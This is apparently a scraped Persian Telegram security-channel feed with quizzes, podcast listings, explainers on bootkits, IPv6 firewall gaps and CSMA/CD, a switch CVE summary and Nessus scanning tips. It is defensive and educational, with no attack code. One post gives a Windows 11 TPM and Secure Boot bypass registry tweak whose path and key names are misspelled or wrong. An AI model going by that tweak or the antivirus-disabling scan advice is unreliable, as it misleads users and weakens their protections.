Forwarded from Safe Defense 🇮🇷
یک Malware در زمان اجرا از تکنیک Process Injection استفاده میکند تا خود را در memory space یک Process قابلاعتماد load کند. هدف اصلی این تکنیک چیست؟
Anonymous Quiz
70%
دور زدن ابزارهای Anti-Malware
6%
افزایش سرعت اجرای کد Malware
13%
تزریق Malware به دیسک اصلی
10%
رمزگشایی فایلهای مخرب در memory
👍1
اپیزود 76 رادیو امنیت - روتکیت جدید لینوکسی
LianGroup.net
✨قسمت چهلم و سوم Safe Cast✨
New Linux Rotkit
🔹بدافزار ایرانی IOCONTROL روی سیستم های کنترل صنعتی
🔹عملیات چشم دیجیتال هکرهای چینی از طریق تونل VSCode
💢 شرح و بررسی عملکرد و معماری روت کیت لینوکسی PUMAKIT
🎙با اجرای رضا الفت
@safe_defense
#safe_cast
New Linux Rotkit
🔹بدافزار ایرانی IOCONTROL روی سیستم های کنترل صنعتی
🔹عملیات چشم دیجیتال هکرهای چینی از طریق تونل VSCode
💢 شرح و بررسی عملکرد و معماری روت کیت لینوکسی PUMAKIT
🎙با اجرای رضا الفت
@safe_defense
#safe_cast
👍3
یکی از خطا های احتمالی که هنگام نصب ویندوز 11 ، 12 و ویندوز سرور 2022 و 2025 ممکنه بهش بخوریم ......
خطای که میده اینه که حدقل نیاز های سخت افزاری برای من رفع نشده یکی از دلایلش قدیمی بودن سیستم Bios هستش و منابع محدودی روی سیستم وجود داره و یه ماژول امنیتی سخت افزاری بنام
TPM
مخفف Trusted Platform Module
وجود نداره و به همین دلیل این نسخه از ویندوز ها چون نمیتونن از اون ماژول استفاده کنن خطای حدقل منابع سخت افزاری رو میدن
درمورد ماژول امنیتی tpm توی پست های بعدی توضیح میدم ...
برای رفعش
هنگام نصب کلید ترکیبی
shift + F10
رو میزنیم که کامند پرام باز میشه
وارد ریجستری ویندوز میشیم از این قسمت
regedit
حالا وارد مسیر
HKE_LOCAL_MACHINE
system
setup
در قسمت setup یه کلید ایجاد میکنیم
کلیک راست و new key و یه اسمی میدیم بهش
۳ تا کلید میسازیم داخلش
new --> bypass securboot
new --> ram by pass
new --> tpm check
مقدار هر ۳ تارو 1 میزاریم یعنی دور زدن رو انجام بده
و مشکل ما حل میشه
@sec_netw🕷
خطای که میده اینه که حدقل نیاز های سخت افزاری برای من رفع نشده یکی از دلایلش قدیمی بودن سیستم Bios هستش و منابع محدودی روی سیستم وجود داره و یه ماژول امنیتی سخت افزاری بنام
TPM
مخفف Trusted Platform Module
وجود نداره و به همین دلیل این نسخه از ویندوز ها چون نمیتونن از اون ماژول استفاده کنن خطای حدقل منابع سخت افزاری رو میدن
درمورد ماژول امنیتی tpm توی پست های بعدی توضیح میدم ...
برای رفعش
هنگام نصب کلید ترکیبی
shift + F10
رو میزنیم که کامند پرام باز میشه
وارد ریجستری ویندوز میشیم از این قسمت
regedit
حالا وارد مسیر
HKE_LOCAL_MACHINE
system
setup
در قسمت setup یه کلید ایجاد میکنیم
کلیک راست و new key و یه اسمی میدیم بهش
۳ تا کلید میسازیم داخلش
new --> bypass securboot
new --> ram by pass
new --> tpm check
مقدار هر ۳ تارو 1 میزاریم یعنی دور زدن رو انجام بده
و مشکل ما حل میشه
@sec_netw🕷
🔥3
Forwarded from Safe Defense 🇮🇷
در یک عملیات Red Team پیشرفته، مهاجم برای پنهانسازی عملیات C2 خود از تکنیک Domain Fronting استفاده کرده است. کدام یک از سناریوهای زیر بهترین توصیف برای نحوه عملکرد این تکنیک است؟
Final Results
42%
ارسال دادههای C2 با ترافیک HTTPS به یک دامنهی legit که درخواست را به سرور C2 مهاجم هدایت میکند.
13%
مخفی کردن payload داخل یک فایل تصویری و ارسال آن به سرور C2 از طریق پروتکل HTTP.
27%
ایجاد یک دامنه تقلبی مشابه دامنههای معتبر و ارسال درخواستهای C2 به آن.
19%
استفاده از پروتکل DNS Tunneling برای برقراری ارتباط با سرور C2.
👍2
اپیزود 77 رادیو امنیت - استفاده هکرها از مایکروسافت تیمز برای بارگزاری…
LianGroup.net
✨قسمت چهلم و چهارم Safe Cast✨
Exploit Microsoft Teams and AnyDesk to Deploy DarkGate Malware
🔹عملیات علیه بدافزار BADBOX
🔹آسیب پذیری Apache Struts
💢 استفاده هکرها از Microsoft teams برای بارگزاری بدافزار Darkgate
🎙با اجرای رضا الفت
@safe_defense
#safe_cast
Exploit Microsoft Teams and AnyDesk to Deploy DarkGate Malware
🔹عملیات علیه بدافزار BADBOX
🔹آسیب پذیری Apache Struts
💢 استفاده هکرها از Microsoft teams برای بارگزاری بدافزار Darkgate
🎙با اجرای رضا الفت
@safe_defense
#safe_cast
👍2
ViperNułł
@sec_netw🕷
📍یکی از نکات امنیتی بسیار مهم توی پروتکل های ipv4 و ipv6
تجهیزات ما به طور پیش فرض از ipv6 پشتیبانی میکنن و حتی ممکنه روی فایروال ها روتر های ما بصورت پیشفرض فعال باشه. این قابلیت اگه بصورت صحیح مدیریت نشه میتونه باعث بشه که نفوذگران فرصت برای حمله ایجاد کنن
یعنی وقتی که ما پالیسی های امنیتی خودمون رو روی ipv4 تعریف کنیم ( برای مثال acl یا قوانین فایروال برای محدود کردن ترافیک ورودی و خروجی که اعمال میکنیم ) این قوانین فقط برای ipv4 اعمال میشه. اما اگه ipv6 به طور فعال روی تجهیزات شبکه ما فعال باشه و ما قوانین امنیتی رو برای این پروتکول در نطر نگیریم مهاجمین میتونن با استفاده از ادرس های ipv6 به راحتی اون محدودیت های ipv4 رو دور بزنن و به این ترتیب میتونن حمله های مختلفی مانند اسکن شبکه دسترسی به منابع حساس یا حتی حملات ddos رو بدون اینکه قوانین امنیتی ما اونارو شناسایی کنن به راحتی انجام بشن.
🔆 برای مثال اگه اتکر بتونه از ادرس ipv6 معتبر توی شبکه ما استفاده کنه این ادرس دربرابر قوانین فایروال ما برای ipv4 غیرقابل شناسایی میشه و در نتیجه تمامی ساست هایی که روی ipv4 تعریف کردیم به راحتی دور زده میشه
✅ راه حل ؛ اگه ما توی شبکه نیاز به استفاده از ipv6 نداریم مهم ترین اقدام اینه که این پروتکل رو غیرفعال بکنیم. غیرفعال کردن ipv6 باعث میشه که تجهیزات و فایروال ها تنها به ترافیک ipv4 توجه کنن و حملات از سمت ipv6 نخاهیم داشت اما اگه از این پروتکل استفاده میکنید توصیه میکنم که فرایند های امنیتی رو این پروتکل هم انجام بدید
⭕و در اخر برسی و مدیریت صحیح پروتکول های مختلف شبکه و تنظیم پالیسی های امنیتی میتونه امنیت شبکه رو افزایش بده
@sec_netw🕷
تجهیزات ما به طور پیش فرض از ipv6 پشتیبانی میکنن و حتی ممکنه روی فایروال ها روتر های ما بصورت پیشفرض فعال باشه. این قابلیت اگه بصورت صحیح مدیریت نشه میتونه باعث بشه که نفوذگران فرصت برای حمله ایجاد کنن
یعنی وقتی که ما پالیسی های امنیتی خودمون رو روی ipv4 تعریف کنیم ( برای مثال acl یا قوانین فایروال برای محدود کردن ترافیک ورودی و خروجی که اعمال میکنیم ) این قوانین فقط برای ipv4 اعمال میشه. اما اگه ipv6 به طور فعال روی تجهیزات شبکه ما فعال باشه و ما قوانین امنیتی رو برای این پروتکول در نطر نگیریم مهاجمین میتونن با استفاده از ادرس های ipv6 به راحتی اون محدودیت های ipv4 رو دور بزنن و به این ترتیب میتونن حمله های مختلفی مانند اسکن شبکه دسترسی به منابع حساس یا حتی حملات ddos رو بدون اینکه قوانین امنیتی ما اونارو شناسایی کنن به راحتی انجام بشن.
🔆 برای مثال اگه اتکر بتونه از ادرس ipv6 معتبر توی شبکه ما استفاده کنه این ادرس دربرابر قوانین فایروال ما برای ipv4 غیرقابل شناسایی میشه و در نتیجه تمامی ساست هایی که روی ipv4 تعریف کردیم به راحتی دور زده میشه
✅ راه حل ؛ اگه ما توی شبکه نیاز به استفاده از ipv6 نداریم مهم ترین اقدام اینه که این پروتکل رو غیرفعال بکنیم. غیرفعال کردن ipv6 باعث میشه که تجهیزات و فایروال ها تنها به ترافیک ipv4 توجه کنن و حملات از سمت ipv6 نخاهیم داشت اما اگه از این پروتکل استفاده میکنید توصیه میکنم که فرایند های امنیتی رو این پروتکل هم انجام بدید
⭕و در اخر برسی و مدیریت صحیح پروتکول های مختلف شبکه و تنظیم پالیسی های امنیتی میتونه امنیت شبکه رو افزایش بده
@sec_netw🕷
🔥3
محققان سه آسیبپذیری خطرناک توی سوئیچهای WGS-804HPT که توی سیستمهای اتوماسیون استفاده میشه پیدا کردن. این آسیبپذیریها میتونن به مهاجمها اجازه بدن که از راه دور کد دلخواه اجرا کنن 🟩
⤷ CVE-2024-52320 & CVE-2024-48871 : Critical 9.8
با یه درخواست HTTP مخرب، مهاجمها میتونن سیستم رو هک کنن و کد دلخواه اجرا کنن
مثال عملی برای این آسیب پذیری ⏬
1️⃣شما توی یه شرکت کار میکنید و همه سیستمها به همین سوئیچهای WGS-804HPT وصلن
2️⃣یه مهاجم از اینترنت یا از بیرون میاد و با ارسال یه درخواست HTTP به سوئیچها میتونه شبکه رو دستکاری کنه
3️⃣حالا، چون سیستم شما به این شبکه وصل بوده، مهاجم میتونه به راحتی به دستگاه شما وارد بشه و اطلاعات رو بدزده یا حتی به دستگاه شما حمله کنه
4️⃣در نهایت، ممکنه ویندوز شما مستقیماً تحت تاثیر این آسیبپذیریها نباشه، ولی اگه شبکهای که بهش وصل هستید آسیبپذیر باشه، دستگاه شما هم ممکنه در معرض خطر قرار بگیره
#آسیب_پذیری
@sec_netw🕷
⤷ CVE-2024-52320 & CVE-2024-48871 : Critical 9.8
با یه درخواست HTTP مخرب، مهاجمها میتونن سیستم رو هک کنن و کد دلخواه اجرا کنن
مثال عملی برای این آسیب پذیری ⏬
1️⃣شما توی یه شرکت کار میکنید و همه سیستمها به همین سوئیچهای WGS-804HPT وصلن
2️⃣یه مهاجم از اینترنت یا از بیرون میاد و با ارسال یه درخواست HTTP به سوئیچها میتونه شبکه رو دستکاری کنه
3️⃣حالا، چون سیستم شما به این شبکه وصل بوده، مهاجم میتونه به راحتی به دستگاه شما وارد بشه و اطلاعات رو بدزده یا حتی به دستگاه شما حمله کنه
4️⃣در نهایت، ممکنه ویندوز شما مستقیماً تحت تاثیر این آسیبپذیریها نباشه، ولی اگه شبکهای که بهش وصل هستید آسیبپذیر باشه، دستگاه شما هم ممکنه در معرض خطر قرار بگیره
#آسیب_پذیری
@sec_netw🕷
👍3
Forwarded from Cyber Warfar
75836 Document.pdf
3.7 MB
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥1
اپیزود 79 رادیو امنیت - پنج تهدید بزرگ بدافزارها برای سال 2025
liangroup.net
✨قسمت چهلم و ششم Safe Cast✨
خبرهای داغ :
🔹حذف بدافزار plugX توسط FBI
🔹کیت فیشینگ Sneaky 2FA روی حساب های Microsoft 365
🔹حمله بدافزار روسی به قزاقستان
🔹باج افزار RansomHub با Backdoor Python
زنگ خطر CVE های داغ هفته :
🔹Windows Hyper V NT Kernel Integration VSP
🔹Fortinet
🔹Apple macOS
🔹Kubernetes
دور دنیا در امنیت سایبری :
🔹طرح انگلستان جهت ممنوعیت پرداخت باج به هکرها
🔹نشت اطلاعات Gravy Analytics
🔹اتصال کارمندان شرکت ها به هکرها از طریق سرویس دارک وبی
🔹تکنیک PVC موثر در استخراج دیتا از حافظه Raspberry Pi
بخش اصلی :
💢 5 تهدید بزرگ Malware برای سال 2025 :
🔺Lumma
🔺XWorm
🔺AsyncRAT
🔺Remcos
🔺LockBit
🎙با اجرای رضا الفت
@safe_defense
#safe_cast
خبرهای داغ :
🔹حذف بدافزار plugX توسط FBI
🔹کیت فیشینگ Sneaky 2FA روی حساب های Microsoft 365
🔹حمله بدافزار روسی به قزاقستان
🔹باج افزار RansomHub با Backdoor Python
زنگ خطر CVE های داغ هفته :
🔹Windows Hyper V NT Kernel Integration VSP
🔹Fortinet
🔹Apple macOS
🔹Kubernetes
دور دنیا در امنیت سایبری :
🔹طرح انگلستان جهت ممنوعیت پرداخت باج به هکرها
🔹نشت اطلاعات Gravy Analytics
🔹اتصال کارمندان شرکت ها به هکرها از طریق سرویس دارک وبی
🔹تکنیک PVC موثر در استخراج دیتا از حافظه Raspberry Pi
بخش اصلی :
💢 5 تهدید بزرگ Malware برای سال 2025 :
🔺Lumma
🔺XWorm
🔺AsyncRAT
🔺Remcos
🔺LockBit
🎙با اجرای رضا الفت
@safe_defense
#safe_cast
👍3
🔒 what is #Bootkit?
#بوت_کیت چیست؟
نوعی #بدافزار مدرن برای اتصال نرم افزار های مخرب به سیستم های کامپیوتری
اغلب از ابزار های #روت_کیت برای فرار از تشخیص استفاده میکنند
هدف این حملات UEFI# است
نرمافزاری که سیستم عامل کامپیوتر را به سخت افزار دستگاه متصل میکند.
#Rootkit vs Bootkit :تفاوت روت کیت و بوت کیت
روت کیت مجموعه ای از ابزار های نرم افزاری برای دادن کنترل از راه دور سیستم به مهاجمان طراحی شده است
🔹به گونه ای ساخته شده که بدون تشخیص باقی بمانند.
🔹با غیر فعال کردن آنتی ویروس امکان نصب نرم افزار های مخرب را فراهم میکنند
🔹 با هدف حمله به امنیت شبکه یا برنامهها به سیستم وارد میشوند.
🔻بوت کیت ها این فرآیند را یک قدم به جلو برده اند.برای آلوده کردن رکورد بوت طراحی شدند با این کار بوت کیت میتواند قبل از بارگذاری سیستم عامل اجرا شود.آلودگی های بوت کیت معمولا تشخیص داده نمیشوند زیرا تمام اجزای آن خارج از سیستم فایل ویندوز قرار دارند.
🔹برخی از نشانههای آلودگی بوتکیت شامل ناپایداری سیستم (مانند نمایش صفحه آبی) و عدم توانایی در راهاندازی سیستم عامل است.
____________________________________
🔐چرا بوتکیتها یک تهدید امنیتی جدی هستند؟
بوت کیت خطرناک است چون حذف آن دشوار است به جای نوشته شدن روی هارد در مادربرد جاسازی شده
پیامد های وجود روت کیت در سیستم شما:
حذف فایلها,دسترسی از راه دور,سرقت اطلاعات,نصب بدافزار های بیشتر
🔸پیشگیری از آلودگی به بوتکیت
سورس بوت: این ویژگی امنیتی تضمین میکند که سیستم فقط با نرمافزارهای مورد اعتماد راهاندازی شود.
اجتناب از رسانههای ناشناس(USB,CD,DVD,ISO,NETWORK): از بوت سیستم عامل از رسانههای ناشناس خودداری کنید.
بهروزرسانی سیستم: همیشه سیستم عامل و فِرموِر(میان افزار) خود را بهروز نگه دارید.
🔸حذف بوتکیت
حذف بوتکیت امکانپذیر است و نیاز به نرمافزارهای تخصصی حذف بدافزار دارد. حذف روتکیتها اغلب آسانتر است، زیرا میتوانید هارد دیسک خود را پاک کنید تا آنها را حذف کنید. یافتن ابزار مناسب برای حذف آلودگی بوتکیت از سیستم شما بسیار مهم است.
🔸چگونه از شر بوتکیتها خلاص شویم؟
نوع ابزاری که نیاز دارید، یک دیسک تعمیر بوت است که میتواند رکورد بوت اصلی (Master Boot Record) شما را پاک کند. این نرمافزار باید برای پاککردن رکورد بوت اصلی استفاده شود، نه تعمیر آن. به این ترتیب میتوانید مطمئن شوید که بوتکیت حذف شده است. پس از پاککردن، میتوانید یک رکورد بوت اصلی تمیز ایجاد کنید و پارتیشنهای جدید درایو را فرمت کنید.
🔸از خود در برابر حملات بدافزاری محافظت کنید
با آگاهی از تهدیدات بدافزاری پنهان، میتوانید کسبوکار خود را در برابر بوتکیتها و سایر حملات روتکیت ایمن نگه دارید.
#بوت_کیت چیست؟
نوعی #بدافزار مدرن برای اتصال نرم افزار های مخرب به سیستم های کامپیوتری
اغلب از ابزار های #روت_کیت برای فرار از تشخیص استفاده میکنند
هدف این حملات UEFI# است
نرمافزاری که سیستم عامل کامپیوتر را به سخت افزار دستگاه متصل میکند.
#Rootkit vs Bootkit :تفاوت روت کیت و بوت کیت
روت کیت مجموعه ای از ابزار های نرم افزاری برای دادن کنترل از راه دور سیستم به مهاجمان طراحی شده است
🔹به گونه ای ساخته شده که بدون تشخیص باقی بمانند.
🔹با غیر فعال کردن آنتی ویروس امکان نصب نرم افزار های مخرب را فراهم میکنند
🔹 با هدف حمله به امنیت شبکه یا برنامهها به سیستم وارد میشوند.
🔻بوت کیت ها این فرآیند را یک قدم به جلو برده اند.برای آلوده کردن رکورد بوت طراحی شدند با این کار بوت کیت میتواند قبل از بارگذاری سیستم عامل اجرا شود.آلودگی های بوت کیت معمولا تشخیص داده نمیشوند زیرا تمام اجزای آن خارج از سیستم فایل ویندوز قرار دارند.
🔹برخی از نشانههای آلودگی بوتکیت شامل ناپایداری سیستم (مانند نمایش صفحه آبی) و عدم توانایی در راهاندازی سیستم عامل است.
____________________________________
🔐چرا بوتکیتها یک تهدید امنیتی جدی هستند؟
بوت کیت خطرناک است چون حذف آن دشوار است به جای نوشته شدن روی هارد در مادربرد جاسازی شده
پیامد های وجود روت کیت در سیستم شما:
حذف فایلها,دسترسی از راه دور,سرقت اطلاعات,نصب بدافزار های بیشتر
🔸پیشگیری از آلودگی به بوتکیت
سورس بوت: این ویژگی امنیتی تضمین میکند که سیستم فقط با نرمافزارهای مورد اعتماد راهاندازی شود.
اجتناب از رسانههای ناشناس(USB,CD,DVD,ISO,NETWORK): از بوت سیستم عامل از رسانههای ناشناس خودداری کنید.
بهروزرسانی سیستم: همیشه سیستم عامل و فِرموِر(میان افزار) خود را بهروز نگه دارید.
🔸حذف بوتکیت
حذف بوتکیت امکانپذیر است و نیاز به نرمافزارهای تخصصی حذف بدافزار دارد. حذف روتکیتها اغلب آسانتر است، زیرا میتوانید هارد دیسک خود را پاک کنید تا آنها را حذف کنید. یافتن ابزار مناسب برای حذف آلودگی بوتکیت از سیستم شما بسیار مهم است.
🔸چگونه از شر بوتکیتها خلاص شویم؟
نوع ابزاری که نیاز دارید، یک دیسک تعمیر بوت است که میتواند رکورد بوت اصلی (Master Boot Record) شما را پاک کند. این نرمافزار باید برای پاککردن رکورد بوت اصلی استفاده شود، نه تعمیر آن. به این ترتیب میتوانید مطمئن شوید که بوتکیت حذف شده است. پس از پاککردن، میتوانید یک رکورد بوت اصلی تمیز ایجاد کنید و پارتیشنهای جدید درایو را فرمت کنید.
🔸از خود در برابر حملات بدافزاری محافظت کنید
با آگاهی از تهدیدات بدافزاری پنهان، میتوانید کسبوکار خود را در برابر بوتکیتها و سایر حملات روتکیت ایمن نگه دارید.
🔥3
Forwarded from لیان - آموزش امنیت و تستنفوذ
CIS Controls Benchmarks.pdf
1.1 MB
عنوان مقاله: CIS Controls Benchmarks
نویسنده: هیژا خسروی (دانشجوی دوره Security+ آکادمی لیان)
💻 🔫 🔫 🔫 🔫 🔫 🔫 🔫 🔫 🔫
☺️ https://liangroup.net/
☺️ @AcademyLian
نویسنده: هیژا خسروی (دانشجوی دوره Security+ آکادمی لیان)
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2👏1
Forwarded from Safe Defense 🇮🇷
تیم آبی در بررسی ترافیک شبکه متوجه میشه که بعضی endpointها در ساعات غیرکاری کانکشنهای مداومی با یک IP ناشناس خارجی برقرار میکنند. این ارتباطات دارای الگوی Beaconing هستند و از پورت 443 استفاده میکنند. بهترین روش برای شناسایی و مهار این تهدید چیست؟
Final Results
17%
الف) استفاده از JA3/JA3S Fingerprinting برای شناسایی TLS Handshakeهای مشکوک
13%
ب) مسدود کردن تمامی ارتباطات خروجی روی پورت 443 تا بررسی کامل انجام شود
34%
ج) اعمال Deep Packet Inspection (DPI) روی تمامی ترافیک HTTPS برای شناسایی C2
35%
د) قرنطینه کردن سیستمهای مشکوک و اجرای Forensic Analysis برای یافتن بدافزار
❤🔥2👍1
Forwarded from Safe Defense 🇮🇷
Safe Defense 🇮🇷
تیم آبی در بررسی ترافیک شبکه متوجه میشه که بعضی endpointها در ساعات غیرکاری کانکشنهای مداومی با یک IP ناشناس خارجی برقرار میکنند. این ارتباطات دارای الگوی Beaconing هستند و از پورت 443 استفاده میکنند. بهترین روش برای شناسایی و مهار این تهدید چیست؟
پاسخ صحیح:
الف) استفاده از JA3/JA3S Fingerprinting برای شناسایی TLS Handshakeهای مشکوک
در کل Beaconing به ارتباطات مداوم و زمانبندیشده بین یک سیستم آلوده و سرور C2 گفته میشه. این نوع ترافیک معمولاً رمزگذاری شده (TLS/HTTPS) است و شناسایی اش بدون Decryption چالشبرانگیزه.
ا JA3/JA3S Fingerprinting یک روش موثر برای تشخیص ارتباطات C2 مخفیشده در TLS Traffic است. تو این روش TLS Handshake تحلیل شده و بر اساس ویژگیهاش (مثل Cipher Suites, Extensions, TLS Version) یک Fingerprint منحصربهفرد تولید میشه.
خیلی از ابزارهای Red Teaming مثل Cobalt Strike, Empire, Meterpreter از الگوهای خاصی در TLS استفاده میکنند که میشه با JA3 شناسایی کرد.
چرا بقیه گزینهها اشتباه یا کم اثرند؟
ب) مسدود کردن تمامی ارتباطات خروجی روی پورت 443
غیرعملی و مخرب: پورت 443 رو مسدود کنید ارتباط سازمان با اینترنت قطع میشه .
از اونطرف هکرها میتونن از پورتهای دیگه (مثلاً 53, 8443) استفاده کنند و این روش راهحل درست نیست.
ج) اعمال Deep Packet Inspection (DPI) روی تمامی ترافیک HTTPS
ببینید DPI بدون TLS Decryption فقط هدرهای اولیه رو بررسی میکنه و محتوای واقعی پکتها رو نمیبینه.
تو TLS Decryption در مقیاس سازمانی کار پیچیده و پرهزینه ست و خیلی از سازمانها به دلیل مسائل حریم خصوصی و عملکردی اون رو انجام نمیدن.
در JA3 میشه بدون نیاز به Decryption ارتباطات مشکوک رو شناسایی کرد.
د) قرنطینه کردن سیستمهای مشکوک و اجرای Forensic Analysis
این روش واکنشی (Reactive) است، یعنی بعد از آلودگی سیستم انجام میشه.
در Forensic Analysis ضروریه اما باید بهعنوان گام دوم بعد از شناسایی اولیه استفاده بشه.
نتیجه:
ا JA3/JA3S Fingerprinting بهترین روش برای شناسایی Beaconing Traffic در TLS است :
✅ بدون نیاز به Decryption میتونه C2 Traffic رو تشخیص بده.
✅ در برابر روشهای مخفیسازی و Evasion مقاومه
✅ با ابزارهایی مثل Zeek, Suricata و SIEM پیادهسازی میشه.
@safe_defense
#quiz
الف) استفاده از JA3/JA3S Fingerprinting برای شناسایی TLS Handshakeهای مشکوک
در کل Beaconing به ارتباطات مداوم و زمانبندیشده بین یک سیستم آلوده و سرور C2 گفته میشه. این نوع ترافیک معمولاً رمزگذاری شده (TLS/HTTPS) است و شناسایی اش بدون Decryption چالشبرانگیزه.
ا JA3/JA3S Fingerprinting یک روش موثر برای تشخیص ارتباطات C2 مخفیشده در TLS Traffic است. تو این روش TLS Handshake تحلیل شده و بر اساس ویژگیهاش (مثل Cipher Suites, Extensions, TLS Version) یک Fingerprint منحصربهفرد تولید میشه.
خیلی از ابزارهای Red Teaming مثل Cobalt Strike, Empire, Meterpreter از الگوهای خاصی در TLS استفاده میکنند که میشه با JA3 شناسایی کرد.
چرا بقیه گزینهها اشتباه یا کم اثرند؟
ب) مسدود کردن تمامی ارتباطات خروجی روی پورت 443
غیرعملی و مخرب: پورت 443 رو مسدود کنید ارتباط سازمان با اینترنت قطع میشه .
از اونطرف هکرها میتونن از پورتهای دیگه (مثلاً 53, 8443) استفاده کنند و این روش راهحل درست نیست.
ج) اعمال Deep Packet Inspection (DPI) روی تمامی ترافیک HTTPS
ببینید DPI بدون TLS Decryption فقط هدرهای اولیه رو بررسی میکنه و محتوای واقعی پکتها رو نمیبینه.
تو TLS Decryption در مقیاس سازمانی کار پیچیده و پرهزینه ست و خیلی از سازمانها به دلیل مسائل حریم خصوصی و عملکردی اون رو انجام نمیدن.
در JA3 میشه بدون نیاز به Decryption ارتباطات مشکوک رو شناسایی کرد.
د) قرنطینه کردن سیستمهای مشکوک و اجرای Forensic Analysis
این روش واکنشی (Reactive) است، یعنی بعد از آلودگی سیستم انجام میشه.
در Forensic Analysis ضروریه اما باید بهعنوان گام دوم بعد از شناسایی اولیه استفاده بشه.
نتیجه:
ا JA3/JA3S Fingerprinting بهترین روش برای شناسایی Beaconing Traffic در TLS است :
✅ بدون نیاز به Decryption میتونه C2 Traffic رو تشخیص بده.
✅ در برابر روشهای مخفیسازی و Evasion مقاومه
✅ با ابزارهایی مثل Zeek, Suricata و SIEM پیادهسازی میشه.
@safe_defense
#quiz
👍3
ViperNułł
@sec_netw🕷
پروتکول CSMA/CD در متد ارتباطی half duplex چیست؟
--
پروتکول csma/cd مخفف
CSMA/CD (carrier sense maltiple access / calition ditction )
که یک تکنولوژی در متد ارتباطی half duplex هست که با استاندارد IEE802.3 مشخص شده هست که برای جلوگیری از به وجود امدن تداخل در ارتباط دو دستگاه باهم استفاده میشه
--
متود ارتباطی half duplex طوریه که دیتا بین دو کامپیوتر بصورت هم زمان نمیتونه ارسال بشه و فقط یک کامپیوتر مجاز هست ارسال داده کنه و دریافت کننده باید زمانی شروع به ارسال کنه که خط خلوطه و ارسالی وجود نداره در غیر این صورت تداخل (calition) به وجود میاد ( یک بیسیم رو درنظر بگیرید که بصورت هم زمان نمیشه صحبت کرد )
--
تجهیز hup نمونه ای هست که از متد ارتباطی half duplex استفاده میکنه
و همچنین برخی از مودم های قدیمی dial-up و بیسیم ها از این متد ارتباطی استفاده میکنن
--
عملکرد csma/cd در متد ارتباطی half duplex
-شنود فعال : هردستگاه پیش از آغاز انتقال داده،وضعیت رسانه را از نظر فعالیت سایر گره ها برسی میکنه
-اگر دیتایی وجود نداشته باشه ( عدم وجود سیگنال ارسالی ) ، فرآیند انتقال آغاز مسشه .
-درصورت مشغول بودن رسانه، دستگاه منتظر میمونه و پس از تشخیص انتقال رو شروع میکنه
--
ارسال داده و پایش همزمان ( Transmission with Detection )
-دستگاه در حین ارسال بسته ، بطور پیوسته سیگنال های دریافتی از رسانه را تحلیل میکنه
درحالت عادی سیگنال ارسالی باید با سیگنال دریافتی مطابقت داشته باشه در غیر این صورت تداخل (calition) تشخصی داده میشه
--
مدیریت برخورد
-درصورت تشخیص برخورد، دستگاه بلافاصله ارسال رو متوقف میکنه و یک سیگنال ارسال میکنه تا بقیه کلاینت ها از برخورد مطلع بشن
و بعد دستگاه وارد فاز انتظار تصادفی میشه و یه زمانی تایین میشه .
و بعد از پایان زمان تلاش مجدد میکنه و فرایند کریر سنس رو اجرا میکنه و درصورت ازاد بودن انتقال از سر میگیره
@sec_netw🕷
--
پروتکول csma/cd مخفف
CSMA/CD (carrier sense maltiple access / calition ditction )
که یک تکنولوژی در متد ارتباطی half duplex هست که با استاندارد IEE802.3 مشخص شده هست که برای جلوگیری از به وجود امدن تداخل در ارتباط دو دستگاه باهم استفاده میشه
--
متود ارتباطی half duplex طوریه که دیتا بین دو کامپیوتر بصورت هم زمان نمیتونه ارسال بشه و فقط یک کامپیوتر مجاز هست ارسال داده کنه و دریافت کننده باید زمانی شروع به ارسال کنه که خط خلوطه و ارسالی وجود نداره در غیر این صورت تداخل (calition) به وجود میاد ( یک بیسیم رو درنظر بگیرید که بصورت هم زمان نمیشه صحبت کرد )
--
تجهیز hup نمونه ای هست که از متد ارتباطی half duplex استفاده میکنه
و همچنین برخی از مودم های قدیمی dial-up و بیسیم ها از این متد ارتباطی استفاده میکنن
--
عملکرد csma/cd در متد ارتباطی half duplex
-شنود فعال : هردستگاه پیش از آغاز انتقال داده،وضعیت رسانه را از نظر فعالیت سایر گره ها برسی میکنه
-اگر دیتایی وجود نداشته باشه ( عدم وجود سیگنال ارسالی ) ، فرآیند انتقال آغاز مسشه .
-درصورت مشغول بودن رسانه، دستگاه منتظر میمونه و پس از تشخیص انتقال رو شروع میکنه
--
ارسال داده و پایش همزمان ( Transmission with Detection )
-دستگاه در حین ارسال بسته ، بطور پیوسته سیگنال های دریافتی از رسانه را تحلیل میکنه
درحالت عادی سیگنال ارسالی باید با سیگنال دریافتی مطابقت داشته باشه در غیر این صورت تداخل (calition) تشخصی داده میشه
--
مدیریت برخورد
-درصورت تشخیص برخورد، دستگاه بلافاصله ارسال رو متوقف میکنه و یک سیگنال ارسال میکنه تا بقیه کلاینت ها از برخورد مطلع بشن
و بعد دستگاه وارد فاز انتظار تصادفی میشه و یه زمانی تایین میشه .
و بعد از پایان زمان تلاش مجدد میکنه و فرایند کریر سنس رو اجرا میکنه و درصورت ازاد بودن انتقال از سر میگیره
@sec_netw🕷
👏3
ViperNułł
@sec_netw🕷
نکاتی که زمان scan nessus باید بهش توجه کنیم !
1-اگه روی virtual machine اسکن اسیب پذیری با نرم افزار نسوس رو انجام میدیم حتما باید درحال bridged قرارش بدین به دلیل اینکه زمانی که روی host-only قرارش میدن امکانش هست که فایروال یکسری پورت هارو ببنده و برای اسکن بهتر این گزینه رو روی های bridged قرار بدین
2-اصلا نباید هیچ نرم افزار امنیتی روی virtual machine و os اصلیتون فعال باشه نرم افزار های مثل انتی ویروس و فایروال و... جلوی اسکن رو بخاطر شرایطامنیتی میگیرن و خروجی خوبی دریافت نخاهید کرد
3-نرم افزار نسوس میاد سرور های مارو از zone های مختلف اسکن میکنه اگه در ورودی فایروال ، ips و تجهیزات های امنیتی دیگه ای وجود داشته باشه جلوی اسکن رو میگرن باید داخل این تجهیزات رول بنویسیم که از سورس نسوس به تمامی سرویس ها و سیستم عامل های شبکمون ارتباط داشته باشه و حتی داخل نرم افزار انتی ویروس باید نرم افزار نسوس رو داخل white list قرارش بدیم
4-حتما در قسمت policy تب credentials یوزنیم و پسورد هر سیستم عامل رو بدین برای اسکن کامل و دقیق تر و اکه قصد دارین سرویس خاستی رو بهتر اسکن کنید از همین تب یوزر نیم و پسورد اون سرویس رو بدین چون درحالت عادی این اتفاق نمیفته و بیشتر روی خود سیستم عامل اسکن رو انجام میده
------- ودرآخر حتما بعد از اسکن رول هایی که نوشتید رو پاک کنید و درزمان استفاده دوباره رول بنویسید ------
@sec_netw🕷
